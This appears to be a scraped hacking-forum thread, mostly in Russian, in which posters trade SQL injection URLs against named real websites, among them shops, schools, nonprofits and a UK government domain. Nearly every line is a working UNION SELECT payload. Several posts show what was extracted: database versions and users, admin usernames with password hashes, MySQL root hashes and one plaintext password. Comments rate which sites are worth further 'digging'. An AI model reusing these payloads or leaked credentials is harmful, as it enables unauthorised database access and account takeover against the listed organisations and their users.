http://www.dvd.inmsk.ru/full_descript.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,aes_decrypt(aes_encrypt(concat(user(),char(50),version(),char(50),database()),1),1),57/* [email protected]_1-log2compinmsk
Code: http://www.proenergy.ru/news.html?news_id=-43/**/union/**/select/**/1,2,3,4,5,6,7,concat(version(),0x3a,database(),0x3a,user())/* Вывод ошибки очень информативен ------------------------------------------------------------ Code: http://www.lipki.ru/?action=read&t_id=4&c_id=-97/**/union/**/select/**/1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7/*&lang=ru ---------------------------------------------------------- Code: http://www.ritambhara.com/photos.php?galid=330+union+select+1,2,3,version(),5,6,7/* Code: http://www.ritambhara.com/basket.php?unitid=5097%20union%20select%201,2,3,4,5,6,7/* Code: http://www.ritambhara.com/unit.php?typeid=-220+union+select+1,2,3,4/* Форум phpbb но до таблицы наверное нет доступа --------------------------------------------------------- Code: http://www.teapot.ru/articles.php?id=99999/**/union/**/select/**/1,2,version()/*
http://doctor-al.ru/ Code: http://doctor-al.ru/get_news.php?news_id=-1+UNION+SELECT+1,2,3,VERSION(),5,6,7/* БД 5, есть какой-то магазин, ПР высокий. Ковырять влом. http://superski.ru/ Code: http://superski.ru/adm/show.php?news_id=-1+UNION+SELECT+1,2,VERSION(),4,5,6,7/* ПР 4. БД 5. http://www.peer.org/ Code: http://www.peer.org/news/news_id.php?row_id=-1+UNION+SELECT+VERSION(),2,3,4/* БД 4. Какой-то буржуйский ресурс. 2bobob +1 xD
www.jensen-lewis.com Code: http://www.jensen-lewis.com/product.php?col_id=999999999999+UNION+SELECT+1,2,3,4,5/* 5.0.38-Ubuntu_0ubuntu1.2-log jensenlewis jl@localhost www.intecma.de Code: http://www.intecma.de/scripts/main.php?view_id=9999999+UNION+SELECT+1,2,3,4,5,6/* 5.0.32-Debian_7etch5-log intecma00 intecma00@localhost www.anped.org Code: http://www.anped.org/index.php?part=999999999'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10/* 5.0.32-Debian_7etch5-log www.korce.eu Code: http://www.korce.eu/panel.php?kategoria=99999999999999+UNION+SELECT+@@version/* 4.1.22-log www.wmcoe.gov.uk Code: http://www.wmcoe.gov.uk/index.php?page=999999999999'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/* 5.0.22-community-max-nt www.ruralhome.org Code: http://www.ruralhome.org/infoNews.php?id=99999999'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10/* 4.1.20-log
Исследовательский центр История фамилии http://www.familii.ru/index.php?pCode=vote&voteID=73674+union+select+concat_ws(char(58),TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),2+from+INFORMATION_SCHEMA.COLUMNS/* http://www.familii.ru/index.php?pCode=vote&voteID=73674+union+select+concat(login,char(58),passwd),2+from+users/* ADMIN:7ab6684faaf74beeccb73263c7030935 serg:c4ca4238a0b923820dcc509a6f75849b = 1; ИА "День http://www.dayudm.ru/phorum.php?msid=23185+union+select+1,2,3,4,5,concat(user,char(58),password),7,8,9,10+from+mysql.user/* root:*9C02C8F396EAD8B7ACC0B9B4F4CD20135483E3D3 m17617:*1E29CBD36E9AE8BDFC9957759470DDBDF065EA92 Роллеры питера http://rollerpiter.ru/?p=5+union+select+1,2,3,4,5,6,7,8,9,10,11,concat(user(),char(58),database(),char(58),version()),13,14/*
http://www.search.uz/ Code: http://www.search.uz/review.php?sid=0x2d33313731303427%20union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/* 4.1.22-standard:searchu_se@localhost:searchu_se
http://www.shkola.spb.ru/server_news/index.phtml?id=-736+union+select+1,2,3,4,5,6,7,8,9,10,version(),user(),database(),14,15,16,17,18/*
eipcprograms.com - Egyptian International Programming Center Code: http://www.eipcprograms.com/product.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13/* 5.0.24a-log:d60350056:u70382875@cgihost
10-ти летию The Asylum посвящается... Code: http://www.theasylum.cc/product.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* 5.0.22:asylum_main1:gf65431@localhost Таба account с полями user и pass Пользователь один [ логин : пасс ] : paul : g0g0asylum
Code: http://www.moygolos.ru/article.php?a=author&id=-4'+union+select+1,2,3,4,concat_ws(char(58),email,pass)+from+user+where+id+limit+0,1/*
Квырнул дальше: http://www.ais.com.ua/auto_listing.php?page_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x2A,user,password)+FROM+mysql.user/* root*183b2d0876ceb447 http://www.ais.com.ua/auto_listing.php?page_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x2A,user,password)+FROM+mysql.user+limit+1,2/*
Code: http://research.calacademy.org/research/ichthyology/catalog/getname.asp?rank=species&id=1 or 1=@@version-- ver=Microsoft SQL Server 2000 db=CoFWeb user=IUSR_MATANGO
http://www.showbizlistings.com/ http://www.hillelatucf.com/ http://www.oregonwineconnection.com/ http://www.webeatforeclosure.com/ В последнем вывода нету, если интересно, то можно поиграть с подзапросами, прочитав предварительно статью 1dt.w0lf'a.
http://www.au-pair-box.com/FORMfields/examples/gebot/fview_shorttimeemployment.php?__id=-1+UNION+SELECT+concat_ws(0x2A,user,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+mysql.user/* root*7a284bd27d344a90
http://www.bigfork.org/memberCategory.php?CategoryID=null/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat_ws(0x202d20,version(),user(),database())/* http://www.fetes.org/Category.php?CategoryID=null/**/UNION/**/SELECT/**/concat_ws(0x202d20,version(),user(),database())/* http://www.ebalongolf.com/products.php?CatID=null/**/UNION/**/SELECT/**/1,2,concat_ws(0x202d20,version(),user(),database()),4,5,6,7,8,9,10,11,12,13/* http://www.ocasi.org/index.php?catid=null/**/UNION/**/SELECT/**/concat_ws(0x202d20,version(),user(),database()),2/* http://ghjobs.org/index.php?pgid=null/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x202d20,version(),user(),database())/* http://www.webcall95.com/index.php?pgid='UNION/**/SELECT/**/1,2,concat_ws(0x202d20,version(),user(),database()),4,5,6,7/* http://www.mysliborski.art.pl/gallery_sv.php?katId=null+UNION+SELECT+1,concat_ws(0x202d20,version(),user(),database()),3,4,5,6-- Is it possible to dump something INTO Dumpfile, when magic_quotes_gpc is switched on? I tried to hex-encode the path, but no file is created then.
Australian Open Shop SQL inj: Code: http://www.australianopenshop.com/category.php?id=5+and+1=0+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12/* 5.0.27-community-nt Есть таблица tbluser, и колонки txtusername, txtpassword Code: http://www.australianopenshop.com/category.php?id=5+and+1=0+UNION+SELECT+1,column_name,3,4,5,6,7,8,9,10,11,12+from+information_schema.columns+where+table_name=0x74626c75736572+limit+1,1/* Получем имя и хэш: Code: http://www.australianopenshop.com/category.php?id=5+and+1=0+UNION+SELECT+1,concat_ws(0x3a,txtusername,txtpassword),3,4,5,6,7,8,9,10,11,12+from+tbluser/* jowang:b997cf0fe04484502df1f089789efaad
